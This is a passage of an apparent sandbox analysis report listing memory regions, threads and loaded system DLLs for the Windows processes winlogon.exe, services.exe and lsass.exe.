filename = "" Region: id = 9278 start_va = 0x9825170000 end_va = 0x982517ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825170000" filename = "" Region: id = 9788 start_va = 0x9825180000 end_va = 0x982518ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825180000" filename = "" Region: id = 9789 start_va = 0x9823250000 end_va = 0x9823250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823250000" filename = "" Region: id = 10310 start_va = 0x9823250000 end_va = 0x982325ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823250000" filename = "" Region: id = 10311 start_va = 0x9823220000 end_va = 0x9823220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823220000" filename = "" Thread: id = 331 os_tid = 0x4c0 Thread: id = 332 os_tid = 0x2b4 Thread: id = 333 os_tid = 0x220 Thread: id = 334 os_tid = 0x21c Thread: id = 335 os_tid = 0x1f8 Thread: id = 336 os_tid = 0x1c8 Thread: id = 337 os_tid = 0x1c4 Thread: id = 338 os_tid = 0x1c0 Thread: id = 339 os_tid = 0x1bc Thread: id = 340 os_tid = 0x1b8 Thread: id = 341 os_tid = 0x1a0 Process: id = "37" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x4a1e4000" os_pid = "0x1cc" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x108" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 342 os_tid = 0x2dc Thread: id = 343 os_tid = 0x2c0 Thread: id = 344 os_tid = 0x1d0 Process: id = "38" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x49808000" os_pid = "0x1e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x194" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2826 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2827 start_va = 0x1d813e0000 end_va = 0x1d813effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001d813e0000" filename = "" Region: id = 2828 start_va = 0x1d813f0000 end_va = 0x1d813f4fff entry_point = 0x1d813f0000 region_type = mapped_file name = "services.exe.mui" filename = "\\Windows\\System32\\en-US\\services.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\services.exe.mui") Region: id = 2829 start_va = 0x1d81400000 end_va = 0x1d81413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001d81400000" filename = "" Region: id = 2830 start_va = 0x1d814a0000 end_va = 0x1d814a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001d814a0000" filename = "" Region: id = 2831 start_va = 0x1d814b0000 end_va = 0x1d814b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001d814b0000" filename = "" Region: id = 2832 start_va = 0x1d81540000 end_va = 0x1d81540fff entry_point = 0x0 region_type = private name = "private_0x0000001d81540000" filename = "" Region: id = 2833 start_va = 0x1d81570000 end_va = 0x1d81576fff entry_point = 0x0 region_type = private name = "private_0x0000001d81570000" filename = "" Region: id = 2834 start_va = 0x1d81580000 end_va = 0x1d815fffff entry_point = 0x0 region_type = private name = "private_0x0000001d81580000" filename = "" Region: id = 2835 start_va = 0x1d81600000 end_va = 0x1d816fffff entry_point = 0x0 region_type = private name = "private_0x0000001d81600000" filename = "" Region: id = 2836 start_va = 0x1d81700000 end_va = 0x1d817bdfff entry_point = 0x1d81700000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2837 start_va = 0x1d818b0000 end_va = 0x1d818b6fff entry_point = 0x0 region_type = private name = "private_0x0000001d818b0000" filename = "" Region: id = 2838 start_va = 0x1d81900000 end_va = 0x1d819fffff entry_point = 0x0 region_type = private name = "private_0x0000001d81900000" filename = "" Region: id = 2839 start_va = 0x1d81a00000 end_va = 0x1d81a7ffff entry_point = 0x0 region_type = private name = "private_0x0000001d81a00000" filename = "" Region: id = 2840 start_va = 0x1d81b80000 end_va = 0x1d81bfffff entry_point = 0x0 region_type = private name = "private_0x0000001d81b80000" filename = "" Region: id = 2841 start_va = 0x1d81c00000 end_va = 0x1d81c7ffff entry_point = 0x0 region_type = private name = "private_0x0000001d81c00000" filename = "" Region: id = 2842 start_va = 0x1d81d80000 end_va = 0x1d81dfffff entry_point = 0x0 region_type = private name = "private_0x0000001d81d80000" filename = "" Region: id = 2843 start_va = 0x1d81e00000 end_va = 0x1d81efffff entry_point = 0x0 region_type = private name = "private_0x0000001d81e00000" filename = "" Region: id = 2844 start_va = 0x7df5ff290000 end_va = 0x7ff5ff28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff290000" filename = "" Region: id = 2845 start_va = 0x7ff6c0ef4000 end_va = 0x7ff6c0ef5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c0ef4000" filename = "" Region: id = 2846 start_va = 0x7ff6c0efa000 end_va = 0x7ff6c0efbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c0efa000" filename = "" Region: id = 2847 start_va = 0x7ff6c0efc000 end_va = 0x7ff6c0efdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c0efc000" filename = "" Region: id = 2848 start_va = 0x7ff6c0f00000 end_va = 0x7ff6c0ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c0f00000" filename = "" Region: id = 2849 start_va = 0x7ff6c1000000 end_va = 0x7ff6c1022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c1000000" filename = "" Region: id = 2850 start_va = 0x7ff6c1025000 end_va = 0x7ff6c1025fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c1025000" filename = "" Region: id = 2851 start_va = 0x7ff6c1026000 end_va = 0x7ff6c1027fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c1026000" filename = "" Region: id = 2852 start_va = 0x7ff6c102a000 end_va = 0x7ff6c102bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c102a000" filename = "" Region: id = 2853 start_va = 0x7ff6c1800000 end_va = 0x7ff6c186ffff entry_point = 0x7ff6c1800000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2854 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2855 start_va = 0x7ffaf3500000 end_va = 0x7ffaf3547fff entry_point = 0x7ffaf3500000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2856 start_va = 0x7ffaf3550000 end_va = 0x7ffaf35ddfff entry_point = 0x7ffaf3550000 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 2857 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2858 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2859 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2860 start_va = 0x7ffaf4210000 end_va = 0x7ffaf422afff entry_point = 0x7ffaf4210000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 2861 start_va = 0x7ffaf4230000 end_va = 0x7ffaf4249fff entry_point = 0x7ffaf4230000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2862 start_va = 0x7ffaf4250000 end_va = 0x7ffaf4257fff entry_point = 0x7ffaf4250000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2863 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2864 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2865 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2866 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2867 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2868 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2869 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2870 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2871 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2872 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 345 os_tid = 0x354 Thread: id = 346 os_tid = 0x338 Thread: id = 347 os_tid = 0x334 Thread: id = 348 os_tid = 0x25c Thread: id = 349 os_tid = 0x23c Thread: id = 794 os_tid = 0xd14 Process: id = "39" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x4a127000" os_pid = "0x1ec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e894" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x194" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3508 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3509 start_va = 0x31bac00000 end_va = 0x31bac0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031bac00000" filename = "" Region: id = 3510 start_va = 0x31bac10000 end_va = 0x31bac10fff entry_point = 0x0 region_type = private name = "private_0x00000031bac10000" filename = "" Region: id = 3511 start_va = 0x31bac20000 end_va = 0x31bac33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031bac20000" filename = "" Region: id = 3512 start_va = 0x31bac40000 end_va = 0x31bacbffff entry_point = 0x0 region_type = private name = "private_0x00000031bac40000" filename = "" Region: id = 3513 start_va = 0x31bacc0000 end_va = 0x31bacc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031bacc0000" filename = "" Region: id = 3514 start_va = 0x31bacd0000 end_va = 0x31bacd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031bacd0000" filename = "" Region: id = 3515 start_va = 0x31bace0000 end_va = 0x31bace1fff entry_point = 0x0 region_type = private name = "private_0x00000031bace0000" filename = "" Region: id = 3516 start_va = 0x31bacf0000 end_va = 0x31badadfff entry_point = 0x31bacf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3517 start_va = 0x31badb0000 end_va = 0x31badb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031badb0000" filename = "" Region: id = 3518 start_va = 0x31badc0000 end_va = 0x31badcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031badc0000" filename = "" Region: id = 3519 start_va = 0x31badd0000 end_va = 0x31baddafff entry_point = 0x31badd0000 region_type = mapped_file name = "lsasrv.dll.mui" filename = "\\Windows\\System32\\en-US\\lsasrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsasrv.dll.mui") Region: id = 3520 start_va = 0x31bade0000 end_va = 0x31bade2fff entry_point = 0x31bade0000 region_type = mapped_file name = "msprivs.dll" filename = "\\Windows\\System32\\msprivs.dll" (normalized: "c:\\windows\\system32\\msprivs.dll") Region: id = 3521 start_va = 0x31badf0000 end_va = 0x31badfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031badf0000" filename = "" Region: id = 3522 start_va = 0x31bae00000 end_va = 0x31bae00fff entry_point = 0x0 region_type = private name = "private_0x00000031bae00000" filename = "" Region: id = 3523 start_va = 0x31bae10000 end_va = 0x31bae16fff entry_point = 0x0 region_type = private name = "private_0x00000031bae10000" filename = "" Region: id = 3524 start_va = 0x31baea0000 end_va = 0x31baeb0fff entry_point = 0x31baea0000 region_type = mapped_file name = "c_28591.nls" filename = "\\Windows\\System32\\C_28591.NLS" (normalized: "c:\\windows\\system32\\c_28591.nls") Region: id = 3525 start_va = 0x31baec0000 end_va = 0x31baec0fff entry_point = 0x0 region_type = private name = "private_0x00000031baec0000" filename = "" Region: id = 3526 start_va = 0x31baed0000 end_va = 0x31baed0fff entry_point = 0x0 region_type = private name = "private_0x00000031baed0000" filename = "" Region: id = 3527 start_va = 0x31baee0000 end_va = 0x31baee0fff entry_point = 0x0 region_type = private name = "private_0x00000031baee0000" filename = "" Region: id = 3528 start_va = 0x31baef0000 end_va = 0x31baef0fff entry_point = 0x0 region_type = private name = "private_0x00000031baef0000" filename = "" Region: id = 3529 start_va = 0x31baf00000 end_va = 0x31baffffff entry_point = 0x0 region_type = private name = "private_0x00000031baf00000" filename = "" Region: id = 3530 start_va = 0x31bb000000 end_va = 0x31bb07ffff entry_point = 0x0 region_type = private name = "private_0x00000031bb000000" filename = "" Region: id = 3531 start_va = 0x31bb080000 end_va = 0x31bb0fffff entry_point = 0x0 region_type = private name = "private_0x00000031bb080000" filename = "" Region: id = 3532 start_va = 0x31bb100000 end_va = 0x31bb17ffff entry_point = 0x0 region_type = private name = "private_0x00000031bb100000" filename = "" Region: id = 3533 start_va = 0x31bb180000 end_va = 0x31bb180fff entry_point = 0x0 region_type = private name = "private_0x00000031bb180000" filename = "" Region: id = 3534 start_va = 0x31bb190000 end_va = 0x31bb190fff entry_point = 0x0 region_type = private name = "private_0x00000031bb190000" filename = "" Region: id = 3535 start_va = 0x31bb1a0000 end_va = 0x31bb1a0fff entry_point = 0x0 region_type = private name = "private_0x00000031bb1a0000" filename = "" Region: id = 3536 start_va = 0x31bb1b0000 end_va = 0x31bb1b0fff entry_point = 0x0 region_type = private name = "private_0x00000031bb1b0000" filename = "" Region: id = 3537 start_va = 0x31bb1c0000 end_va = 0x31bb1c6fff entry_point = 0x0 region_type = private name = "private_0x00000031bb1c0000" filename = "" Region: id = 3538 start_va = 0x31bb1d0000 end_va = 0x31bb1d0fff entry_point = 0x31bb1d0000 region_type = mapped_file name = "vaultsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\vaultsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vaultsvc.dll.mui") Region: id = 3539 start_va = 0x31bb1f0000 end_va = 0x31bb1f9fff entry_point = 0x31bb1f0000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 3540 start_va = 0x31bb200000 end_va = 0x31bb2fffff entry_point = 0x0 region_type = private name = "private_0x00000031bb200000" filename = "" Region: id = 3541 start_va = 0x31bb300000 end_va = 0x31bb37ffff entry_point = 0x0 region_type = private name = "private_0x00000031bb300000" filename = "" Region: id = 3542 start_va = 0x31bb380000 end_va = 0x31bb6b6fff entry_point = 0x31bb380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3543 start_va = 0x31bb6c0000 end_va = 0x31bb73ffff entry_point = 0x0 region_type = private name = "private_0x00000031bb6c0000" filename = "" Region: id = 3544 start_va = 0x31bb7c0000 end_va = 0x31bb7d1fff entry_point = 0x31bb7c0000 region_type = mapped_file name = "dnsapi.dll.mui" filename = "\\Windows\\System32\\en-US\\dnsapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dnsapi.dll.mui") Region: id = 3545 start_va = 0x31bb800000 end_va = 0x31bb8fffff entry_point = 0x0 region_type = private name = "private_0x00000031bb800000" filename = "" Region: id = 3546 start_va = 0x31bb900000 end_va = 0x31bb9fffff entry_point = 0x0 region_type = private name = "private_0x00000031bb900000" filename = "" Region: id = 3547 start_va = 0x7df5ffb80000 end_va = 0x7ff5ffb7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb80000" filename = "" Region: id = 3548 start_va = 0x7ff680fbc000 end_va = 0x7ff680fbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff680fbc000" filename = "" Region: id = 3549 start_va = 0x7ff680fbe000 end_va = 0x7ff680fbffff entry_point = 0x0 region_type = private name = "private_0x00007ff680fbe000" filename = "" Region: id = 3550 start_va = 0x7ff680fc0000 end_va = 0x7ff6810bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff680fc0000" filename = "" Region: id = 3551 start_va = 0x7ff6810c0000 end_va = 0x7ff6810e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6810c0000" filename = "" Region: id = 3552 start_va = 0x7ff6810e4000 end_va = 0x7ff6810e4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6810e4000" filename = "" Region: id = 3553 start_va = 0x7ff6810e6000 end_va = 0x7ff6810e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6810e6000" filename = "" Region: id = 3554 start_va = 0x7ff6810e8000 end_va = 0x7ff6810e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6810e8000" filename = "" Region: id = 3555 start_va = 0x7ff6810ea000 end_va = 0x7ff6810ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6810ea000" filename = "" Region: id = 3556 start_va = 0x7ff6810ee000 end_va = 0x7ff6810effff entry_point = 0x0 region_type = private name = "private_0x00007ff6810ee000" filename = "" Region: id = 3557 start_va = 0x7ff681b50000 end_va = 0x7ff681b5ffff entry_point = 0x7ff681b50000 region_type = mapped_file name = "lsass.exe" filename = "\\Windows\\System32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe") Region: id = 3558 start_va = 0x7ffae9750000 end_va = 0x7ffae9763fff entry_point = 0x7ffae9750000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 3559 start_va = 0x7ffae9770000 end_va = 0x7ffae9797fff entry_point = 0x7ffae9770000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 3560 start_va = 0x7ffae97a0000 end_va = 0x7ffae97f8fff entry_point = 0x7ffae97a0000 region_type = mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 3561 start_va = 0x7ffae9800000 end_va = 0x7ffae981efff entry_point = 0x7ffae9800000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 3562 start_va = 0x7ffaf0500000 end_va = 0x7ffaf0552fff entry_point = 0x7ffaf0500000 region_type = mapped_file name = "vaultsvc.dll" filename = "\\Windows\\System32\\vaultsvc.dll" (normalized: "c:\\windows\\system32\\vaultsvc.dll") Region: id = 3563 start_va = 0x7ffaf0610000 end_va = 0x7ffaf061bfff entry_point = 0x7ffaf0610000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 3564 start_va = 0x7ffaf0680000 end_va = 0x7ffaf073dfff entry_point = 0x7ffaf0680000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 3565 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3566 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3567 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3568 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3569 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3570 start_va = 0x7ffaf3640000 end_va = 0x7ffaf368afff entry_point = 0x7ffaf3640000 region_type = mapped_file name = "scecli.dll" filename = "\\Windows\\System32\\scecli.dll" (normalized: "c:\\windows\\system32\\scecli.dll") Region: id = 3571 start_va = 0x7ffaf3690000 end_va = 0x7ffaf36c4fff entry_point = 0x7ffaf3690000 region_type = mapped_file name = "dpapisrv.dll" filename = "\\Windows\\System32\\dpapisrv.dll" (normalized: "c:\\windows\\system32\\dpapisrv.dll") Region: id = 3572 start_va = 0x7ffaf36d0000 end_va = 0x7ffaf36ebfff entry_point = 0x7ffaf36d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3573 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3574 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3575 start_va = 0x7ffaf3730000 end_va = 0x7ffaf374ffff entry_point = 0x7ffaf3730000 region_type = mapped_file name = "efslsaext.dll" filename = "\\Windows\\System32\\efslsaext.dll" (normalized: "c:\\windows\\system32\\efslsaext.dll") Region: id = 3576 start_va = 0x7ffaf3750000 end_va = 0x7ffaf375cfff entry_point = 0x7ffaf3750000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 3577 start_va = 0x7ffaf3760000 end_va = 0x7ffaf37dafff entry_point = 0x7ffaf3760000 region_type = mapped_file name = "pcptpm12.dll" filename = "\\Windows\\System32\\PCPTpm12.dll" (normalized: "c:\\windows\\system32\\pcptpm12.dll") Region: id = 3578 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3579 start_va = 0x7ffaf3820000 end_va = 0x7ffaf3838fff entry_point = 0x7ffaf3820000 region_type = mapped_file name = "pcpksp.dll" filename = "\\Windows\\System32\\PCPKsp.dll" (normalized: "c:\\windows\\system32\\pcpksp.dll") Region: id = 3580 start_va = 0x7ffaf3840000 end_va = 0x7ffaf38b3fff entry_point = 0x7ffaf3840000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3581 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3582 start_va = 0x7ffaf38d0000 end_va = 0x7ffaf3914fff entry_point = 0x7ffaf38d0000 region_type = mapped_file name = "microsoftaccountcloudap.dll" filename = "\\Windows\\System32\\MicrosoftAccountCloudAP.dll" (normalized: "c:\\windows\\system32\\microsoftaccountcloudap.dll") Region: id = 3583 start_va = 0x7ffaf3920000 end_va = 0x7ffaf3951fff entry_point = 0x7ffaf3920000 region_type = mapped_file name = "cloudap.dll" filename = "\\Windows\\System32\\cloudAP.dll" (normalized: "c:\\windows\\system32\\cloudap.dll") Region: id = 3584 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3585 start_va = 0x7ffaf39a0000 end_va = 0x7ffaf39dafff entry_point = 0x7ffaf39a0000 region_type = mapped_file name = "wdigest.dll" filename = "\\Windows\\System32\\wdigest.dll" (normalized: "c:\\windows\\system32\\wdigest.dll") Region: id = 3586 start_va = 0x7ffaf39e0000 end_va = 0x7ffaf3a27fff entry_point = 0x7ffaf39e0000 region_type = mapped_file name = "pku2u.dll" filename = "\\Windows\\System32\\pku2u.dll" (normalized: "c:\\windows\\system32\\pku2u.dll") Region: id = 3587 start_va = 0x7ffaf3a30000 end_va = 0x7ffaf3a4bfff entry_point = 0x7ffaf3a30000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 3588 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3589 start_va = 0x7ffaf3a70000 end_va = 0x7ffaf3aadfff entry_point = 0x7ffaf3a70000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3590 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3591 start_va = 0x7ffaf3b60000 end_va = 0x7ffaf3c31fff entry_point = 0x7ffaf3b60000 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3592 